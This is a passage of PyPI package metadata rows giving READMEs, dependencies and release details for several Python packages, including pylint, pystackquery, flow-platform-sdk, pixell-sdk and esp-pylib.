] | [] | https://github.com/raphaelmansuy/edgequake-llm | null | >=3.9 | [] | [] | [] | [
"pytest>=8.0; extra == \"dev\"",
"pytest-asyncio>=0.24; extra == \"dev\"",
"maturin>=1.7; extra == \"dev\"",
"mypy>=1.8; extra == \"dev\"",
"ruff>=0.3; extra == \"dev\""
] | [] | [] | [] | [
"Bug Tracker, https://github.com/raphaelmansuy/edgequake-llm/issues",
"Documentation, https://github.com/raphaelmansuy/edgequake-llm/blob/main/edgequake-litellm/README.md",
"Homepage, https://github.com/raphaelmansuy/edgequake-llm",
"Repository, https://github.com/raphaelmansuy/edgequake-llm"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:08:43.192644 | edgequake_litellm-0.1.1.tar.gz | 709,051 | c8/aa/206f970eb9e37979f7023832fbbd762587e53786f19e765a5f2d25bd53b5/edgequake_litellm-0.1.1.tar.gz | source | sdist | null | false | 6b59e518d1be7886cf7e997570b2a9e4 | 16f55e2cc7a06ba0a42ffddeb6a958f3ba9362b6d1dc5189a551a32ec4d7656f | c8aa206f970eb9e37979f7023832fbbd762587e53786f19e765a5f2d25bd53b5 | null | [] | 587 |
2.4 | modulitiz-mini | 2.11.2 | Raccolta dei miei moduli - versione mini | # modulitiz-mini
It's a Python library that contains daily use or generic functions.
The difference between "micro" is that it requires other dependencies.
## Installation
Use the package manager [pip](https://pip.pypa.io/en/stable/) to install:
```bash
pip install -U modulitiz_mini
```
The other required dependencies will be installed automatically.
## Usage
```python
from modulitiz_mini.ModuloRsa import ModuloRsa
moduloRsa=ModuloRsa()
moduloRsa.generateKeys()
# returns cripted string
moduloRsa.encrypt("test")
...
```
## Contributing
If you find any bug you can write me at [sderfo1234@altervista.org](mailto:sderfo1234@altervista.org)
## License
[MIT](https://choosealicense.com/licenses/mit/)
| text/markdown | null | tiz <sderfo1234@altervista.org> | null | null | null | null | [
"Programming Language :: Python :: 3",
"Operating System :: OS Independent"
] | [] | null | null | >=3.11 | [] | [] | [] | [
"modulitiz-binaries>=2",
"cryptography>=41.0",
"pypdf==6.6.0"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.13.9 | 2026-02-20T09:08:25.004450 | modulitiz_mini-2.11.2-py311-none-any.whl | 11,620 | d5/21/a0e27bde9c54afa5eb2fe2080e7a35251a1ebae38f3e33501770d21e3f3e/modulitiz_mini-2.11.2-py311-none-any.whl | py311 | bdist_wheel | null | false | 4e02e7a0bba0cd49e85c9ebd1c2fff85 | dc486646abc1362fc0e0cfdcab1229e92c4214a8900311c262e8c99ecb1aad6d | d521a0e27bde9c54afa5eb2fe2080e7a35251a1ebae38f3e33501770d21e3f3e | null | [
"LICENSE"
] | 96 |
2.4 | pylint | 4.0.5 | python code static checker | `Pylint`_
=========
.. _`Pylint`: https://pylint.readthedocs.io/
.. This is used inside the doc to recover the start of the introduction
.. image:: https://github.com/pylint-dev/pylint/actions/workflows/tests.yaml/badge.svg?branch=main
:target: https://github.com/pylint-dev/pylint/actions
.. image:: https://codecov.io/gh/pylint-dev/pylint/branch/main/graph/badge.svg?token=ZETEzayrfk
:target: https://codecov.io/gh/pylint-dev/pylint
.. image:: https://img.shields.io/pypi/v/pylint.svg
:alt: PyPI Package version
:target: https://pypi.python.org/pypi/pylint
.. image:: https://readthedocs.org/projects/pylint/badge/?version=latest
:target: https://pylint.readthedocs.io/en/latest/?badge=latest
:alt: Documentation Status
.. image:: https://img.shields.io/badge/code%20style-black-000000.svg
:target: https://github.com/ambv/black
.. image:: https://img.shields.io/badge/linting-pylint-yellowgreen
:target: https://github.com/pylint-dev/pylint
.. image:: https://results.pre-commit.ci/badge/github/pylint-dev/pylint/main.svg
:target: https://results.pre-commit.ci/latest/github/pylint-dev/pylint/main
:alt: pre-commit.ci status
.. image:: https://bestpractices.coreinfrastructure.org/projects/6328/badge
:target: https://bestpractices.coreinfrastructure.org/projects/6328
:alt: CII Best Practices
.. image:: https://img.shields.io/ossf-scorecard/github.com/PyCQA/pylint?label=openssf%20scorecard&style=flat
:target: https://api.securityscorecards.dev/projects/github.com/PyCQA/pylint
:alt: OpenSSF Scorecard
.. image:: https://img.shields.io/discord/825463413634891776.svg
:target: https://discord.gg/qYxpadCgkx
:alt: Discord
What is Pylint?
---------------
Pylint is a `static code analyser`_ for Python 2 or 3. The latest version supports Python
3.10.0 and above.
.. _`static code analyser`: https://en.wikipedia.org/wiki/Static_code_analysis
Pylint analyses your code without actually running it. It checks for errors, enforces a
coding standard, looks for `code smells`_, and can make suggestions about how the code
could be refactored.
.. _`code smells`: https://martinfowler.com/bliki/CodeSmell.html
Install
-------
.. This is used inside the doc to recover the start of the short text for installation
For command line use, pylint is installed with::
pip install pylint
Or if you want to also check spelling with ``enchant`` (you might need to
`install the enchant C library <https://pyenchant.github.io/pyenchant/install.html#installing-the-enchant-c-library>`_):
.. code-block:: sh
pip install pylint[spelling]
It can also be integrated in most editors or IDEs. More information can be found
`in the documentation`_.
.. _in the documentation: https://pylint.readthedocs.io/en/latest/user_guide/installation/index.html
.. This is used inside the doc to recover the end of the short text for installation
What differentiates Pylint?
---------------------------
Pylint is not trusting your typing and is inferring the actual values of nodes (for a
start because there was no typing when pylint started off) using its internal code
representation (astroid). If your code is ``import logging as argparse``, Pylint
can check and know that ``argparse.error(...)`` is in fact a logging call and not an
argparse call. This makes pylint slower, but it also lets pylint find more issues if
your code is not fully typed.
[inference] is the killer feature that keeps us using [pylint] in our project despite how painfully slow it is.
- `Realist pylint user`_, 2022
.. _`Realist pylint user`: https://github.com/charliermarsh/ruff/issues/970#issuecomment-1381067064
pylint, not afraid of being a little slower than it already is, is also a lot more thorough than other linters.
There are more checks, including some opinionated ones that are deactivated by default
but can be enabled using configuration.
How to use pylint
-----------------
Pylint isn't smarter than you: it may warn you about things that you have
conscientiously done or check for some things that you don't care about.
During adoption, especially in a legacy project where pylint was never enforced,
it's best to start with the ``--errors-only`` flag, then disable
convention and refactor messages with ``--disable=C,R`` and progressively
re-evaluate and re-enable messages as your priorities evolve.
Pylint is highly configurable and permits to write plugins in order to add your
own checks (for example, for internal libraries or an internal rule). Pylint also has an
ecosystem of existing plugins for popular frameworks and third-party libraries.
.. note::
Pylint supports the Python standard library out of the box. Third-party
libraries are not always supported, so a plugin might be needed. A good place
to start is ``PyPI`` which often returns a plugin by searching for
``pylint <library>``. `pylint-pydantic`_, `pylint-django`_ and
`pylint-sonarjson`_ are examples of such plugins. More information about plugins
and how to load them can be found at `plugins`_.
.. _`plugins`: https://pylint.readthedocs.io/en/latest/development_guide/how_tos/plugins.html#plugins
.. _`pylint-pydantic`: https://pypi.org/project/pylint-pydantic
.. _`pylint-django`: https://github.com/pylint-dev/pylint-django
.. _`pylint-sonarjson`: https://github.com/cnescatlab/pylint-sonarjson-catlab
Advised linters alongside pylint
--------------------------------
Projects that you might want to use alongside pylint include ruff_ (**really** fast,
with builtin auto-fix and a large number of checks taken from popular linters, but
implemented in ``rust``) or flake8_ (a framework to implement your own checks in python using ``ast`` directly),
mypy_, pyright_ / pylance or pyre_ (typing checks), bandit_ (security oriented checks), black_ and
isort_ (auto-formatting), autoflake_ (automated removal of unused imports or variables), pyupgrade_
(automated upgrade to newer python syntax) and pydocstringformatter_ (automated pep257).
.. _ruff: https://github.com/astral-sh/ruff
.. _flake8: https://github.com/PyCQA/flake8
.. _bandit: https://github.com/PyCQA/bandit
.. _mypy: https://github.com/python/mypy
.. _pyright: https://github.com/microsoft/pyright
.. _pyre: https://github.com/facebook/pyre-check
.. _black: https://github.com/psf/black
.. _autoflake: https://github.com/myint/autoflake
.. _pyupgrade: https://github.com/asottile/pyupgrade
.. _pydocstringformatter: https://github.com/DanielNoord/pydocstringformatter
.. _isort: https://pycqa.github.io/isort/
Additional tools included in pylint
-----------------------------------
Pylint ships with two additional tools:
- pyreverse_ (standalone tool that generates package and class diagrams.)
- symilar_ (duplicate code finder that is also integrated in pylint)
.. _pyreverse: https://pylint.readthedocs.io/en/latest/additional_tools/pyreverse/index.html
.. _symilar: https://pylint.readthedocs.io/en/latest/additional_tools/symilar/index.html
.. This is used inside the doc to recover the end of the introduction
Contributing
------------
.. This is used inside the doc to recover the start of the short text for contribution
We welcome all forms of contributions such as updates for documentation, new code, checking issues for duplicates or telling us
that we can close them, confirming that issues still exist, `creating issues because
you found a bug or want a feature`_, etc. Everything is much appreciated!
Please follow the `code of conduct`_ and check `the Contributor Guides`_ if you want to
make a code contribution.
.. _creating issues because you found a bug or want a feature: https://pylint.readthedocs.io/en/latest/contact.html#bug-reports-feedback
.. _code of conduct: https://github.com/pylint-dev/pylint/blob/main/CODE_OF_CONDUCT.md
.. _the Contributor Guides: https://pylint.readthedocs.io/en/latest/development_guide/contribute.html
.. This is used inside the doc to recover the end of the short text for contribution
Show your usage
-----------------
You can place this badge in your README to let others know your project uses pylint.
.. image:: https://img.shields.io/badge/linting-pylint-yellowgreen
:target: https://github.com/pylint-dev/pylint
Learn how to add a badge to your documentation in `the badge documentation`_.
.. _the badge documentation: https://pylint.readthedocs.io/en/latest/user_guide/installation/badge.html
License
-------
pylint is, with a few exceptions listed below, `GPLv2 <https://github.com/pylint-dev/pylint/blob/main/LICENSE>`_.
The icon files are licensed under the `CC BY-SA 4.0 <https://creativecommons.org/licenses/by-sa/4.0/>`_ license:
- `doc/logo.png <https://raw.githubusercontent.com/pylint-dev/pylint/main/doc/logo.png>`_
- `doc/logo.svg <https://raw.githubusercontent.com/pylint-dev/pylint/main/doc/logo.svg>`_
Support
-------
Please check `the contact information`_.
.. _`the contact information`: https://pylint.readthedocs.io/en/latest/contact.html
.. |tideliftlogo| image:: https://raw.githubusercontent.com/pylint-dev/pylint/main/doc/media/Tidelift_Logos_RGB_Tidelift_Shorthand_On-White.png
:width: 200
:alt: Tidelift
.. list-table::
:widths: 10 100
* - |tideliftlogo|
- Professional support for pylint is available as part of the `Tidelift
Subscription`_. Tidelift gives software development teams a single source for
purchasing and maintaining their software, with professional grade assurances
from the experts who know it best, while seamlessly integrating with existing
tools.
.. _Tidelift Subscription: https://tidelift.com/subscription/pkg/pypi-pylint?utm_source=pypi-pylint&utm_medium=referral&utm_campaign=readme
| text/x-rst | null | Python Code Quality Authority <code-quality@python.org> | null | null | null | lint, linter, python, static code analysis | [
"Development Status :: 6 - Mature",
"Environment :: Console",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Debuggers",
"Topic :: Software Development :: Quality Assurance",
"Topic :: Software Development :: Testing",
"Typing :: Typed"
] | [] | null | null | >=3.10.0 | [] | [] | [] | [
"astroid<=4.1.dev0,>=4.0.2",
"colorama>=0.4.5; sys_platform == \"win32\"",
"dill>=0.2; python_version < \"3.11\"",
"dill>=0.3.6; python_version >= \"3.11\"",
"dill>=0.3.7; python_version >= \"3.12\"",
"isort!=5.13,<9,>=5",
"mccabe<0.8,>=0.6",
"platformdirs>=2.2",
"tomli>=1.1; python_version < \"3.11\"",
"tomlkit>=0.10.1",
"typing-extensions>=3.10; python_version < \"3.10\"",
"pyenchant~=3.2; extra == \"spelling\"",
"gitpython>3; extra == \"testutils\""
] | [] | [] | [] | [
"Bug Tracker, https://github.com/pylint-dev/pylint/issues",
"Discord Server, https://discord.com/invite/Egy6P8AMB5",
"Docs: Contributor Guide, https://pylint.readthedocs.io/en/latest/development_guide/contributor_guide/index.html",
"Docs: User Guide, https://pylint.readthedocs.io/en/latest/",
"homepage, https://github.com/pylint-dev/pylint",
"Source Code, https://github.com/pylint-dev/pylint",
"What's New, https://pylint.readthedocs.io/en/latest/whatsnew/3/"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:07:33.621681 | pylint-4.0.5.tar.gz | 1,572,474 | e4/b6/74d9a8a68b8067efce8d07707fe6a236324ee1e7808d2eb3646ec8517c7d/pylint-4.0.5.tar.gz | source | sdist | null | false | ff24104a1e510616efce2356f3d64988 | 8cd6a618df75deb013bd7eb98327a95f02a6fb839205a6bbf5456ef96afb317c | e4b674d9a8a68b8067efce8d07707fe6a236324ee1e7808d2eb3646ec8517c7d | GPL-2.0-or-later | [
"LICENSE",
"CONTRIBUTORS.txt"
] | 959,810 |
2.4 | pystackquery | 1.0.2 | Async data fetching and caching library for Python | # PyStackQuery
Async data fetching and caching library for Python.
PyStackQuery handles the hard parts of working with async data: caching, deduplication, retries, and reactive state updates. You focus on *what* to fetch, the library handles *how*.
## Installation
```bash
pip install pystackquery
```
Requires Python 3.11+
## Quick Start
```python
import asyncio
from pystackquery import QueryClient, QueryOptions
client = QueryClient()
async def fetch_user(user_id: int) -> dict:
# Your async fetch logic here
async with aiohttp.ClientSession() as session:
async with session.get(f"https://api.example.com/users/{user_id}") as resp:
return await resp.json()
async def main():
# Fetch with automatic caching
user = await client.fetch_query(
QueryOptions(
query_key=("user", "123"),
query_fn=lambda: fetch_user(123)
)
)
# Second call returns cached data instantly
user_again = await client.fetch_query(
QueryOptions(
query_key=("user", "123"),
query_fn=lambda: fetch_user(123)
)
)
asyncio.run(main())
```
That's it. The first call fetches from the API. The second call returns instantly from cache.
## What Problems Does This Solve?
**Without PyStackQuery**, you write code like this over and over:
```python
cache = {}
pending = {}
lock = asyncio.Lock()
async def get_user(user_id):
key = f"user_{user_id}"
async with lock:
if key in cache:
return cache[key]
if key in pending:
return await pending[key]
task = asyncio.create_task(fetch_user(user_id))
pending[key] = task
try:
result = await task
cache[key] = result
return result
finally:
del pending[key]
```
**With PyStackQuery**, you write:
```python
user = await client.fetch_query(
QueryOptions(("user", user_id), lambda: fetch_user(user_id))
)
```
The library handles:
- Caching
- Request deduplication (concurrent calls share one request)
- Automatic retries with backoff
- Stale-while-revalidate
- Cache invalidation
- Reactive updates
## Core Concepts
### Query Keys
Every query needs a unique key. Keys are tuples of strings:
```python
("users",) # All users
("user", "123") # Specific user
("posts", "user", "123") # Posts by user 123
```
Keys enable:
- Cache lookups
- Partial invalidation (invalidate `("users",)` clears all user queries)
### Query Options
Configure how a query behaves:
```python
QueryOptions(
query_key=("user", "123"),
query_fn=lambda: fetch_user(123),
stale_time=60.0, # Data fresh for 60 seconds
retry=3, # Retry 3 times on failure
)
```
### Stale-While-Revalidate
When data becomes stale, you get the cached data immediately while a background refresh happens:
```python
# First call: fetches from API
data = await client.fetch_query(opts)
# Wait for stale_time to pass...
# Second call: returns stale data instantly, refreshes in background
data = await client.fetch_query(opts)
```
Your users see data immediately. Fresh data loads in the background.
## Documentation
See the [docs/](./docs/) folder for comprehensive documentation:
- [Getting Started](./docs/getting-started.md) - Installation and basic usage
- [Query Options](./docs/query-options.md) - All configuration options explained
- [Mutations](./docs/mutations.md) - Handling POST/PUT/DELETE operations
- [Cache Management](./docs/cache-management.md) - Invalidation, prefetching, manual updates
- [Observers](./docs/observers.md) - Reactive state updates
- [Advanced Patterns](./docs/advanced-patterns.md) - Dependent queries, parallel fetching
- [Framework Integrations](./docs/framework-integrations.md) - FastAPI, Tkinter, Textual, CLI tools, Jupyter
- [API Reference](./docs/api-reference.md) - Complete API documentation
## License
MIT
| text/markdown | null | null | null | null | null | async, cache, data-fetching, query, state-management | [
"Development Status :: 4 - Beta",
"Framework :: AsyncIO",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Software Development :: Libraries :: Python Modules",
"Typing :: Typed"
] | [] | null | null | >=3.12 | [] | [] | [] | [
"typing-extensions>=4.0",
"aiohttp>=3.9; extra == \"dev\"",
"mypy>=1.9; extra == \"dev\"",
"pytest-asyncio>=0.23; extra == \"dev\"",
"pytest>=8.0; extra == \"dev\"",
"ruff>=0.3; extra == \"dev\""
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:07:30.171169 | pystackquery-1.0.2.tar.gz | 94,994 | e0/b0/d7a2162020f3b9b0c929610b49e23c955713fd1ab3002b01163c319dcd89/pystackquery-1.0.2.tar.gz | source | sdist | null | false | a3034296b6692ac24b035dcad56181e3 | 43a49c0baa9887e230eb7aec1c448dbc5deb22545900ad618aead841f7d08ff0 | e0b0d7a2162020f3b9b0c929610b49e23c955713fd1ab3002b01163c319dcd89 | MIT | [] | 218 |
2.4 | flow-platform-sdk | 1.0.0 | Python SDK for Uniphore Flow Platform APIs | # Flow Platform SDK
Python SDK for interacting with Uniphore Flow Platform services via async RPC.
## Usage
```python
import asyncio
from flow_platform_sdk import platform_api
async def main():
# List data connectors
connectors = await platform_api.list_connectors()
# Execute SQL query
result = await platform_api.execute_query(
connector_id="conn_123",
sql_query="SELECT * FROM customers LIMIT 10",
max_rows=10
)
# Query knowledge base
answer = await platform_api.query_knowledge_base(
knowledge_base_id="kb_123",
query="What is the revenue?"
)
asyncio.run(main())
```
## API Reference
### Data Connectors
```python
# List all connectors
await platform_api.list_connectors()
# Get schema
await platform_api.get_schema(connector_id="conn_123")
# Execute query
await platform_api.execute_query(
connector_id="conn_123",
sql_query="SELECT * FROM table",
max_rows=1000
)
# Discover schema
await platform_api.discover_schema(
connector_id="conn_123",
include_sample_data=True,
table_filter="customer*"
)
# Get table info
await platform_api.get_table_info(
connector_id="conn_123",
table_name="customers"
)
# Get sample data
await platform_api.get_sample_data(
connector_id="conn_123",
table_name="customers",
limit=5
)
```
### Knowledge Base
```python
# List knowledge bases
await platform_api.list_knowledge_bases()
# Query knowledge base
await platform_api.query_knowledge_base(
knowledge_base_id="kb_123",
query="What are the main features?"
)
```
### Agent Evaluation
```python
# Invoke agent with draft skill
result = await platform_api.invoke_agent(
agent_spec_id="agent_123",
draft_skill_id="draft_456",
input_message="What is the weather today?",
context={"location": "San Francisco"},
timeout=60
)
```
## Architecture
The SDK uses stdio-based RPC for communication with backend services:
- Requests sent to **stdout**: `REMOTE_SERVICE_CALL:{...}`
- Responses read from **stdin**: `REMOTE_TOOL_RESULT:{...}`
Designed for sandboxed execution environments.
## Configuration
- Default timeout: 120 seconds per request
- Daemon threads for clean exit on timeout
## Development
```bash
# Setup
uv sync
# Format code
uvx ruff format .
uvx ruff check .
```
| text/markdown | null | Uniphore <support@uniphore.com> | null | null | null | null | [] | [] | null | null | >=3.10 | [] | [] | [] | [
"httpx>=0.27.0",
"pydantic>=2.0.0",
"typing-extensions>=4.0.0"
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:07:20.560975 | flow_platform_sdk-1.0.0.tar.gz | 8,334 | c2/f5/82ca9619d25bcbaf40759bf9c0aae1e87bf026ecad39df895ef125510870/flow_platform_sdk-1.0.0.tar.gz | source | sdist | null | false | 6e46dbb68ab0ee96170a6b9edc015d22 | 6198bb2c2e6bd2678f4931aeccb9ae0f0d9113fd0696f0259dc8c3fa5ea0a021 | c2f582ca9619d25bcbaf40759bf9c0aae1e87bf026ecad39df895ef125510870 | null | [] | 337 |
2.4 | pixell-sdk | 0.4.32 | A lightweight developer kit for packaging AI agents into portable APKG files | # Pixell Agent Kit
A lightweight developer kit for packaging AI agents into portable, standardized APKG files.
## Installation
### Using pipx (Recommended)
```bash
pipx install pixell-kit
```
### Using Homebrew
```bash
brew install pixell-kit
```
### Using pip
```bash
pip install pixell-kit
```
## Quick Start
```bash
# Create a new agent project
pixell init my_agent
# Run locally for development
cd my_agent
pixell run-dev
# Build into APKG package
pixell build
# Inspect the package
pixell inspect my_agent-0.1.0.apkg
```
## Configuration
Pixell Kit supports flexible configuration management to avoid entering credentials repeatedly. You can configure API keys and app IDs at multiple levels with the following precedence order:
### 1. Environment Variables (Highest Priority)
```bash
export PIXELL_API_KEY=your-api-key
export PIXELL_APP_ID=your-app-id
export PIXELL_ENVIRONMENT=prod
```
### 2. Project-Level Configuration
Create `.pixell/config.json` in your project directory:
```json
{
"api_key": "your-api-key",
"app_id": "your-default-app-id",
"default_environment": "prod",
"environments": {
"prod": {"app_id": "your-production-app-id"},
"staging": {"app_id": "your-staging-app-id"},
"local": {"app_id": "your-local-app-id"}
}
}
```
### 3. Global Configuration
Create `~/.pixell/config.json` for user-wide settings:
```json
{
"api_key": "your-api-key",
"app_id": "your-default-app-id"
}
```
### Configuration Commands
```bash
# Interactive setup (recommended for first-time users)
pixell config init
# Set individual values
pixell config set --api-key your-api-key
pixell config set --app-id your-app-id
pixell config set --env-app-id prod:your-prod-app-id
pixell config set --env-app-id staging:your-staging-app-id
# Set global configuration (affects all projects)
pixell config set --global --api-key your-api-key
# View current configuration
pixell config show
pixell config show --global
```
### Simplified Deployment
Once configured, you can deploy without specifying credentials every time:
```bash
# Deploy to production (uses stored credentials)
pixell deploy --apkg-file my_agent-0.1.0.apkg
# Deploy to staging (uses environment-specific app ID)
pixell deploy --apkg-file my_agent-0.1.0.apkg --env staging
# Deploy to local development
pixell deploy --apkg-file my_agent-0.1.0.apkg --env local
```
## Environment and Secrets
### Phase 1: Required .env in APKG
- Every agent package must include a `.env` at the project root.
- Builds fail if `.env` is missing.
- The builder always includes `.env` in the APKG.
- The validator warns on potential secrets and non-portable absolute paths.
Scaffold:
- `pixell init` generates a `.env.example`. Copy to `.env` and fill values.
Notes:
- Treat `.env` as sensitive; it is packaged. Use placeholders for shared artifacts.
### Phase 2: Runtime Environment Injection (Dev parity)
- The dev server automatically loads `.env` and applies variables to the process environment.
- Precedence (dev): `.env` > base environment.
- Logs show variable keys only, never values.
### Phase 3: Service-Bound Secrets (Dev parity)
- Optional secrets providers can inject runtime secrets without baking them into `.env`.
- Provider selection is controlled by environment variables:
- `PIXELL_SECRETS_PROVIDER=static` with `PIXELL_SECRETS_JSON` (JSON object)
- `PIXELL_SECRETS_PROVIDER=env` to pass-through current process env
- `PIXELL_SECRETS_PROVIDER=aws` to use AWS Secrets Manager with:
- `PIXELL_AWS_SECRETS` (comma-separated secret names/ARNs)
- optional `PIXELL_AWS_REGION`
- Precedence (dev): provider > `.env` > base env.
Example (static):
```bash
export PIXELL_SECRETS_PROVIDER=static
export PIXELL_SECRETS_JSON='{"OPENAI_API_KEY":"runtime","DB_HOST":"database"}'
```
Example (AWS):
```bash
export PIXELL_SECRETS_PROVIDER=aws
export PIXELL_AWS_SECRETS=my/app/secrets,another/secret
export PIXELL_AWS_REGION=us-east-1
```
### Best Practices
- Use `0.0.0.0` for bind addresses inside containers (not `localhost`).
- Avoid absolute, machine-specific paths in `.env`.
- Never log secret values; only keys. The kit adheres to this.
### PAR Guidance (separate runtime)
- Apply precedence in the agent subprocess:
1) Runtime deployment env (highest)
2) `.env` from APKG
3) Base runtime environment (lowest)
- Optionally add service-bound providers per deployment context.
## Features
- 📦 Package any AI agent into portable APKG files
- 🚀 Local development server with hot-reload
- ✅ Manifest validation and package integrity
- 🔐 Optional package signing with GPG
- 🐍 Python 3.11+ support (TypeScript coming soon)
---
## SDK Runtime
The Pixell SDK provides runtime infrastructure for agent execution, including task queue processing, user context management, and progress reporting.
### Installation
```bash
pip install pixell-sdk
```
### Quick Start
```python
import asyncio
from pixell.sdk import UserContext, TaskConsumer
async def handle_task(ctx: UserContext, payload: dict) -> dict:
# Report progress
await ctx.report_progress("starting", percent=0)
# Access user data
profile = await ctx.get_user_profile()
# Call OAuth APIs on behalf of the user
events = await ctx.call_oauth_api(
provider="google",
method="GET",
path="/calendar/v3/calendars/primary/events"
)
await ctx.report_progress("completed", percent=100)
return {"status": "success", "events": len(events.get("items", []))}
async def main():
consumer = TaskConsumer(
agent_id="my-agent",
redis_url="redis://localhost:6379",
pxui_base_url="https://api.pixell.global",
handler=handle_task,
)
async with consumer:
await consumer.start()
if __name__ == "__main__":
asyncio.run(main())
```
### Core Components
| Component | Description |
|-----------|-------------|
| `TaskConsumer` | Redis task queue consumer with concurrency control |
| `UserContext` | Execution context with access to user data and OAuth APIs |
| `ProgressReporter` | Real-time progress updates via Redis pub/sub |
| `PXUIDataClient` | HTTP client for PXUI platform API |
### UserContext Methods
```python
# OAuth API calls (Google, GitHub, Slack, TikTok, etc.)
result = await ctx.call_oauth_api(provider, method, path, body?, headers?)
# User data access
profile = await ctx.get_user_profile()
files = await ctx.get_files(filter?, limit?)
content = await ctx.get_file_content(file_id)
conversations = await ctx.get_conversations(limit?, since?)
history = await ctx.get_task_history(agent_id?, limit?)
# Progress reporting
await ctx.report_progress(status, percent?, message?)
await ctx.report_error(error_type, message, recoverable?)
```
### Error Handling
```python
from pixell.sdk import (
AuthenticationError, # Invalid/expired token
RateLimitError, # Rate limit exceeded (check retry_after)
APIError, # API error response
ConnectionError, # Network failure
TaskTimeoutError, # Task exceeded timeout
)
try:
result = await ctx.call_oauth_api(...)
except RateLimitError as e:
retry_after = e.details.get("retry_after", 60)
await asyncio.sleep(retry_after)
except AuthenticationError:
# Token invalid - cannot retry
raise
```
### Configuration Options
```python
consumer = TaskConsumer(
agent_id="my-agent",
redis_url="redis://localhost:6379",
pxui_base_url="https://api.pixell.global",
handler=handle_task,
concurrency=10, # Max concurrent tasks (default: 10)
poll_interval=1.0, # Queue poll interval in seconds
task_timeout=300.0, # Task timeout in seconds (default: 5 min)
)
```
### Redis Queue Keys
- `pixell:agents:{agent_id}:tasks` - Main task queue
- `pixell:agents:{agent_id}:processing` - Tasks being processed
- `pixell:agents:{agent_id}:dead_letter` - Failed tasks
- `pixell:tasks:{task_id}:progress` - Progress pub/sub channel
---
## Documentation
See the [full documentation](https://docs.pixell.global/pixell) for detailed usage.
For SDK tutorials and advanced patterns, see [SDK_TUTORIAL.md](https://github.com/pixell-global/pixell-kit/blob/main/docs/SDK_TUTORIAL.md).
## Release & Deployment
The pixell-sdk package is **automatically published to PyPI via GitHub Actions** (not manual PyPI API uploads).
### Automatic Publishing
Every push to `main` triggers the publish workflow:
1. **Tests run** - All tests must pass
2. **Version check** - Compares version in `pyproject.toml` against PyPI
3. **Publish** - If version is new, automatically publishes to PyPI
### Publishing a New Version
```bash
# 1. Update version in pyproject.toml
# 2. Commit and push to main
git add pyproject.toml
git commit -m "chore: bump version to X.Y.Z"
git push origin main
# 3. GitHub Actions handles the rest automatically
```
### Manual Trigger
You can also trigger publishing manually via GitHub Actions:
1. Go to **Actions** → **Publish to PyPI on Main Push**
2. Click **Run workflow**
3. Optionally check **Force publish** to republish an existing version
### Workflow Files
- `.github/workflows/publish-main.yml` - Main publish workflow (push to main)
- `.github/workflows/publish.yml` - Release-based publish (on GitHub releases)
- `.github/workflows/test.yml` - CI tests
### Required Secrets
The following secret must be configured in GitHub repository settings:
- `PYPI_API_TOKEN` - PyPI API token for publishing
## License
This project is licensed under the [GNU Affero General Public License v3.0](LICENSE).
For organizations that do not wish to comply with AGPL-3.0 requirements,
commercial licensing options are available. Contact us at engineering@pixell.global.
| text/markdown | Pixell Core Team | Pixell Core Team <dev@pixell.global> | null | null | null | null | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Topic :: Software Development :: Build Tools",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Operating System :: OS Independent"
] | [] | https://github.com/pixell-global/pixell-kit | null | >=3.11 | [] | [] | [] | [
"click>=8.0",
"pydantic>=2.0",
"pyyaml>=6.0",
"jsonschema>=4.0",
"fastapi>=0.100.0",
"uvicorn>=0.23.0",
"watchdog>=3.0",
"python-dotenv>=1.0",
"tabulate>=0.9",
"jinja2>=3.0",
"requests>=2.28.0",
"redis>=5.0.0",
"httpx>=0.25.0",
"pyjwt>=2.8.0",
"pytest>=7.0; extra == \"dev\"",
"pytest-cov>=4.0; extra == \"dev\"",
"pytest-asyncio>=0.21; extra == \"dev\"",
"black>=23.0; extra == \"dev\"",
"mypy>=1.0; extra == \"dev\"",
"ruff>=0.1; extra == \"dev\"",
"build>=1.0; extra == \"dev\"",
"twine>=4.0; extra == \"dev\"",
"types-PyYAML>=6.0; extra == \"dev\"",
"fakeredis>=2.20.0; extra == \"dev\"",
"respx>=0.20.0; extra == \"dev\"",
"pytest-timeout>=2.0; extra == \"dev\"",
"python-gnupg>=0.5; extra == \"signing\""
] | [] | [] | [] | [
"Homepage, https://github.com/pixell-global/pixell-kit",
"Bug Tracker, https://github.com/pixell-global/pixell-kit/issues",
"Documentation, https://docs.pixell.global/pixell",
"Source Code, https://github.com/pixell-global/pixell-kit"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:06:26.446590 | pixell_sdk-0.4.32.tar.gz | 152,236 | 8e/cd/5c556975802f719d507b658dbc5e7965566c64d9503ced59b0df1be39d2e/pixell_sdk-0.4.32.tar.gz | source | sdist | null | false | f1806abc0fcacc4b3196e6b440bdaadf | 554d4560b334e4764e4066df719a3179d4ccfcdb21f1f017d47281f8dd51a355 | 8ecd5c556975802f719d507b658dbc5e7965566c64d9503ced59b0df1be39d2e | AGPL-3.0-only | [
"LICENSE"
] | 204 |
2.4 | esp-pylib | 0.1.3 | Python library for logging, utils and constants for Espressif Systems' Python projects | # esp-pylib
Python library for logging, utils and constants for Espressif Systems' Python projects.
## Installation
```bash
pip install esp-pylib
```
## How to Contribute
First, set up the development environment:
```bash
git clone https://github.com/espressif/esp-pylib.git
cd esp-pylib
python -m venv venv
source venv/bin/activate
pip install -e ".[dev]"
pre-commit install
```
## How to Release (For Maintainers Only)
```bash
python -m venv venv
source venv/bin/activate
pip install commitizen czespressif
git fetch
git checkout -b update/release_v1.1.0
git reset --hard origin/master
cz bump
git push -u
git push --tags
```
